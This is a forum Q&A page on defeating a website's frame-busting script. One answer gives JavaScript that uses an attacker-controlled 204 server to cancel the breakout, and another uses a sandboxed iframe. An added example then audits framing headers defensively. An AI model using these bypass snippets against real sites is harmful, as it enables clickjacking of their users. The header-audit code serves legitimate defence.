Can you beat a frame breaker?

Posted 2019-04-10 07:00

I haven't been able to find much of an answer yet, so I'm just going to ask.

How difficult would it be to stop a frame breaker from working - or even just ignore it?

2 answers
地球回转人心会变
#2 · 2019-04-10 07:13

As per Jeff's question:

As it turns out, your frame-busting code can be busted, as shown here:

<script type="text/javascript">
    var prevent_bust = 0  
    window.onbeforeunload = function() { prevent_bust++ }  
    setInterval(function() {  
      if (prevent_bust > 0) {  
        prevent_bust -= 2  
        window.top.location = 'http://server-which-responds-with-204.com'  
      }  
    }, 1)  
</script>

This code does the following:

  • increments a counter every time the browser attempts to navigate away from the current page, via the window.onbeforeunload event handler
  • sets up a timer that fires every millisecond via setInterval(), and if it sees the counter incremented, changes the current location to a server of the attacker's control
  • that server serves up a page with HTTP status code 204, which does not cause the browser to navigate anywhere
爷的心禁止访问
#3 · 2019-04-10 07:18

This is the solution to your problem, I hope it helped!

<iframe src="URL" sandbox="allow-scripts" width="100%" height="100%" scroll="yes" frameborder="0"></iframe>
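
Both answers above neutralise a frame breaker that runs as script inside the framed page, so the check a site owner can rely on is whether the response carries browser-enforced framing headers instead. The following is an added example, not part of either answer: it classifies who may frame a response from its `Content-Security-Policy` and `X-Frame-Options` headers, assuming one policy per header and lower-cased header names; the function names and sample responses are constructed for illustration.

```javascript
// Added example: audit response headers for browser-enforced anti-framing.
// Assumes header names are lower-cased and each header holds a single policy.

// Return the source list of the first frame-ancestors directive, or null.
function frameAncestors(csp) {
  for (const directive of (csp || '').split(';')) {
    const [name, ...sources] = directive.trim().split(/\s+/);
    if (name.toLowerCase() === 'frame-ancestors') return sources;
  }
  return null;
}

// Classify who may frame the response:
// 'none', 'same-origin', 'allowlist' (review the listed sources) or 'anyone'.
function framingPolicy(headers) {
  const sources = frameAncestors(headers['content-security-policy']);
  if (sources !== null) {
    // When frame-ancestors is present, browsers ignore X-Frame-Options.
    // An empty source list is equivalent to 'none'.
    if (sources.length === 0) return 'none';
    if (sources.length === 1 && sources[0] === "'none'") return 'none';
    if (sources.includes('*')) return 'anyone';
    if (sources.every((s) => s === "'self'")) return 'same-origin';
    return 'allowlist';
  }
  const xfo = (headers['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return 'none';
  if (xfo === 'SAMEORIGIN') return 'same-origin';
  // ALLOW-FROM is obsolete and ignored by current browsers, so it
  // counts as no protection, as does a missing header.
  return 'anyone';
}

// Constructed sample responses, keyed by a hypothetical path.
const SAMPLES = {
  '/login': { 'content-security-policy': "default-src 'self'; frame-ancestors 'none'" },
  '/account': { 'x-frame-options': 'SAMEORIGIN' },
  '/widget': { 'content-security-policy': "frame-ancestors 'self' https://partner.example" },
  '/legacy': { 'x-frame-options': 'ALLOW-FROM https://partner.example' },
  '/js-only': { 'content-type': 'text/html' }, // relies on a script frame breaker alone
};

// Map each path to its framing policy.
function audit(responses) {
  return Object.fromEntries(
    Object.entries(responses).map(([path, h]) => [path, framingPolicy(h)])
  );
}

console.log(audit(SAMPLES));
```

Paths reported as `anyone` can still be framed regardless of any script-based frame breaker in the page body.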
